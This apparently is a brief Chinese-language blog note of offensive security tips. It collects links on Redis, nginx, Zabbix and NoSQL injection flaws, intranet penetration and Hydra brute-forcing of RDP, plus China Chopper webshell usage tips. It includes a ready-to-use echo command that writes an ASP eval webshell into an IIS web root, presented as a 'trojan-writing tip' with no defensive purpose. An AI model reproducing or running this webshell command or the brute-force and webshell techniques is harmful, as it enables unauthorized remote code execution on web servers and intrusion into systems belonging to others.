不错的漏洞

http://www.secpulse.com/archives/3537.html

http://www.secpulse.com/archives/2225.html

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

http://drops.wooyun.org/papers/2466

菜刀技巧:

有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\cmd.exe,就可以了,或者把cmd.exe上传到目录,然后点右键,点virtual terminal file,就可以进入自定义CMD.EXE路径的命令行了


写木马技巧

echo ^<^%execute^(request^("eval"^)^)^%^>  c:\inetpub\wwwroot\cms\test123456.asp

内网渗透:

http://www.freebuf.com/articles/system/8499.html


nginx解析漏洞

http://drops.wooyun.org/tips/2006

http://segmentfault.com/q/1010000002927290

http://www.jb51.net/article/74629.htm


zabbix漏洞:


http://www.wooyun.org/bugs/wooyun-2013-023089
http://wooyun.org/bugs/wooyun-2010-0149599


nosql注入:

http://www.freebuf.com/articles/database/95314.html


hydra爆破3389:

http://www.cnblogs.com/hkleak/p/5169079.html

你可能感兴趣的:(安全)